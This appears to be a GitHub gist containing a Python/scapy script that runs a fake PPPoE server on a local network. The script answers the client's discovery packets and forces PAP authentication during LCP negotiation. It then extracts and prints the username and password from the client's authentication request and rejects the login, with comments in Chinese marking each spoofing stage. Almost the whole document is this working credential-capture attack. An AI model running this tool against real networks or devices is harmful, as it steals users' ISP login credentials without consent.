Skip to content

Instantly share code, notes, and snippets.

@Admingyu
Created November 15, 2018 08:57
Show Gist options
  • Save Admingyu/7d7d4158023a9bb1ac9ebe39f04cfc6b to your computer and use it in GitHub Desktop.
Save Admingyu/7d7d4158023a9bb1ac9ebe39f04cfc6b to your computer and use it in GitHub Desktop.
# coding:utf-8
'''
@author Karblue
@date 2016年2月27日
'''
import struct
import uuid
import copy
import scapy.all as scapy
from scapy.layers.ppp import *
from psutil import net_if_addrs
MAC_ADDRESS = "0a:0a:0a:0a:0a:0a"
# Not suitable for hosts with multiple network cards
def _normalize_mac(address):
    """Return *address* as a colon-separated MAC string, or None if it is not one.

    Accepts six two-digit hexadecimal octets separated by either '-' or ':'.
    Anything else (IPv4/IPv6 addresses, empty values) yields None.
    """
    if not address:
        return None
    octets = address.replace('-', ':').split(':')
    if len(octets) != 6:
        return None
    hex_digits = "0123456789abcdefABCDEF"
    for octet in octets:
        if len(octet) != 2 or octet[0] not in hex_digits or octet[1] not in hex_digits:
            return None
    return ':'.join(octets)


def get_mac_address():
    """Return the MAC addresses of all local network interfaces.

    Every address reported by psutil's ``net_if_addrs()`` is inspected, so a
    host with several interfaces yields several entries (unlike
    ``uuid.getnode()``, which yields a single address).

    psutil reports hardware addresses with '-' on some platforms and ':' on
    others; both spellings are accepted and the result is always
    colon-separated, which is the form scapy expects for Ethernet addresses.

    Returns:
        list of str, e.g. ``["0a:0b:0c:0d:0e:0f", ...]``; empty when no
        hardware address is found.
    """
    addrs = []
    for nic_addrs in net_if_addrs().values():
        for item in nic_addrs:
            mac = _normalize_mac(item.address)
            if mac is not None:
                addrs.append(mac)
    return addrs
class PPPoEServer(object):
    """Fake PPPoE server that captures the credentials a client sends via PAP.

    It answers the discovery stage (PADI -> PADO, PADR -> PADS), then in the
    session stage asks the client for PAP authentication during LCP
    negotiation, prints the username/password carried by the PAP request and
    finally rejects the authentication.

    All packet payloads are handled as ``bytes`` so the class works on
    Python 3 (where ``raw.load`` is a bytes object) as well as Python 2.
    """

    # PPPoE tag types used while walking a discovery payload.
    _TAG_END_OF_LIST = 0x0000
    _TAG_HOST_UNIQ = 0x0103

    def __init__(self):
        # Client MAC -> negotiation state; only membership is consulted.
        self.clientMap = {}
        # Ethernet type -> {packet field name -> {field value -> (handler, log message)}}.
        # Built once instead of on every sniffed packet.
        self._handlers = {
            # Discovery stage
            0x8863: {
                "code": {
                    # PADI
                    0x09: (self.send_pado_packet, "PADI阶段开始,发送PADO..."),
                    # PADR
                    0x19: (self.send_pads_packet, "PADR阶段开始,发送PADS..."),
                },
            },
            # Session stage
            0x8864: {
                "proto": {
                    # LCP link negotiation
                    0xc021: (self.send_lcp_req, "欺骗成功,开始处理数据..."),
                    # PAP authentication
                    0xc023: (self.get_papinfo, "获取账号信息..."),
                },
            },
        }

    def start(self):
        """Start sniffing; every captured packet is passed to ``filterData``."""
        scapy.sniff(lfilter=self.filterData)

    def filterData(self, raw):
        """Dispatch a sniffed packet to the matching PPPoE handler.

        Packets without a ``type`` attribute, or whose type/code/proto are not
        in the dispatch table, are ignored. Always returns None, so sniff()
        never keeps the packet.
        """
        handlers = self._handlers.get(getattr(raw, "type", None))
        if not handlers:
            return
        for field, by_value in handlers.items():
            # A packet with a matching Ethernet type may still lack the field.
            entry = by_value.get(getattr(raw, field, None))
            if entry is None:
                continue
            handler, message = entry
            print(message)
            handler(raw)

    def send_lcp_req(self, raw):
        """Handle an LCP packet; only Configure-Request (code 0x01) is answered.

        The first request from a client is additionally answered with a
        Configure-Reject and with our own Configure-Request asking for PAP.
        Every request is acknowledged.
        """
        # Slice instead of index: bytes[0] is an int on Python 3.
        if raw.load[:1] != b"\x01":
            return
        print("收到LCP-Config-Req")
        if raw.src not in self.clientMap:
            self.send_lcp_reject_packet(raw)
            self.send_lcp_req_packet(raw)
            self.clientMap[raw.src] = {"req": 1, "ack": 0}
        # Whenever a request arrives, echo it back as an ack.
        self.send_lcp_ack_packet(raw)
        print("发送LCP-Config-Ack")

    @staticmethod
    def _parse_pap_request(payload):
        """Extract ``(username, password)`` bytes from a PAP Authenticate-Request.

        Layout: code(1) id(1) length(2) user-len(1) user pass-len(1) password.
        Returns None when the payload is too short for the lengths it declares.
        """
        try:
            (user_len,) = struct.unpack_from("!B", payload, 4)
            user_end = 5 + user_len
            (pass_len,) = struct.unpack_from("!B", payload, user_end)
        except struct.error:
            return None
        pass_start = user_end + 1
        pass_end = pass_start + pass_len
        if pass_end > len(payload):
            return None
        return payload[5:user_end], payload[pass_start:pass_end]

    def get_papinfo(self, raw):
        """Print the credentials of a PAP request (code 0x01) and reject it."""
        payload = raw.load
        if payload[:1] != b"\x01":
            return
        credentials = self._parse_pap_request(payload)
        if credentials is None:
            # Truncated/malformed request: nothing to report or answer.
            return
        user, password = credentials
        print("get User:%s,Pass:%s" % (user.decode("utf-8", "replace"),
                                       password.decode("utf-8", "replace")))
        # Remember the client before replying so the right entry is removed.
        client = raw.src
        self.send_pap_authreject(raw)
        self.clientMap.pop(client, None)
        print("欺骗完毕....")

    def _send_reply(self, raw, load):
        """Send a copy of *raw* back to its sender with *load* as payload."""
        reply = copy.deepcopy(raw)
        reply.dst, reply.src = raw.src, raw.dst
        reply.load = load
        scapy.sendp(reply)

    def send_pap_authreject(self, raw):
        """Reply with a PAP Authenticate-Nak (code 0x03); *raw* is not modified."""
        self._send_reply(raw, b"\x03\x02\x00\x06\x01\x00")

    def send_lcp_ack_packet(self, raw):
        """Echo the LCP request back with its code byte changed to 0x02 (ack)."""
        self._send_reply(raw, b"\x02" + raw.load[1:])

    def send_lcp_reject_packet(self, raw):
        """Echo the LCP request back with its code byte changed to 0x04 (reject)."""
        self._send_reply(raw, b"\x04" + raw.load[1:])

    def send_lcp_req_packet(self, raw):
        """Send our own LCP Configure-Request asking the client to use PAP."""
        # Options: MRU (type 1) = 0x05c8, Authentication-Protocol (type 3) =
        # 0xc023 (PAP), Magic-Number (type 5), followed by four zero bytes.
        options = b"\x01\x04\x05\xc8\x03\x04\xc0\x23\x05\x06\x5e\x63\x0a\xb8\x00\x00\x00\x00"
        # Header: code 0x01, identifier 0x01, 16-bit length = len(options),
        # exactly as the original packet was built.
        # NOTE(review): that value equals the 4-byte header plus the 14 option
        # bytes, so the trailing zeros fall outside the declared length - confirm intended.
        header = struct.pack("!BBH", 0x01, 0x01, len(options))
        self._send_reply(raw, header + options)

    def send_pa_packet(self, raw, **kwargs):
        """Answer a discovery packet (shared by PADO and PADS).

        The reply is sent from ``MAC_ADDRESS`` to the sender of *raw* and
        carries an empty Service-Name tag, an AC-Name tag ("^_^") and, when
        the client supplied one, its Host-Uniq tag. Extra keyword arguments
        are set as packet fields (e.g. ``code``, ``sessionid``).
        """
        reply = copy.deepcopy(raw)
        reply.src, reply.dst = MAC_ADDRESS, raw.src
        # Echo the client's Host-Uniq tag if it sent one.
        host_uniq = self.padi_find_hostuniq(raw.load)
        payload = b"\x01\x01\x00\x00\x01\x02\x00\x03^_^"
        if host_uniq:
            payload += host_uniq
        reply.len = len(payload)
        reply.load = payload
        for field, value in kwargs.items():
            setattr(reply, field, value)
        scapy.sendp(reply)

    def send_lcp_end_packet(self, raw):
        """Send a session-termination packet (PPPoE code 0xA7) to the sender of *raw*."""
        _pkt = Ether(src=raw.dst, dst=raw.src, type=0x8863) / PPPoE(
            version=0x1, type=0x1, code=0xA7, sessionid=0x01, len=0)
        scapy.sendp(_pkt)

    def send_pads_packet(self, raw):
        """Answer a PADR with a PADS (code 0x65) using session id 1."""
        return self.send_pa_packet(raw, code=0x65, sessionid=0x01)

    def send_pado_packet(self, raw):
        """Answer a PADI with a PADO (code 0x07)."""
        return self.send_pa_packet(raw, code=0x07)

    def padi_find_hostuniq(self, raw):
        """Return the complete Host-Uniq tag found in a PPPoE tag list.

        *raw* is the bytes of the discovery payload: a sequence of
        type(2) / length(2) / value records. The records are walked one by
        one, so a 0x0103 byte pair inside another tag's value is never
        mistaken for a Host-Uniq tag.

        Returns:
            The tag including its 4-byte header, or None when no well-formed
            Host-Uniq tag is present.
        """
        offset = 0
        total = len(raw)
        while offset + 4 <= total:
            tag_type, tag_len = struct.unpack_from("!HH", raw, offset)
            if tag_type == self._TAG_END_OF_LIST:
                # End of the tag list (also stops on zero padding).
                return None
            end = offset + 4 + tag_len
            if end > total:
                # Declared length runs past the data: malformed.
                return None
            if tag_type == self._TAG_HOST_UNIQ:
                return raw[offset:end]
            offset = end
        return None
if __name__ == "__main__":
    # Script entry: let the user pick the wired NIC whose MAC the fake server
    # will answer from, then start sniffing.
    macs = get_mac_address()
    print(macs)
    if not macs:
        # Nothing to choose from; prompting would only fail later.
        raise SystemExit('未找到可用的网卡MAC地址')
    # Menu number (starting at 1) -> MAC address.
    mac_dict = dict(enumerate(macs, 1))
    for i, mac in mac_dict.items():
        print('网卡%d, MAC: %s' % (i, mac))
    while True:
        i = input('输入连接的有线网卡序号')
        try:
            selected = mac_dict[int(i)]
        except (KeyError, ValueError):
            # Not a number, or not one of the listed entries: ask again.
            print('无效的序号,请重新输入')
            continue
        break
    # scapy expects colon-separated MAC strings, while psutil may report
    # them with '-' separators.
    MAC_ADDRESS = selected.replace('-', ':')
    print('获取到网卡:', MAC_ADDRESS)
    print('等待pppoe客户端连接...')
    n = PPPoEServer()
    n.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment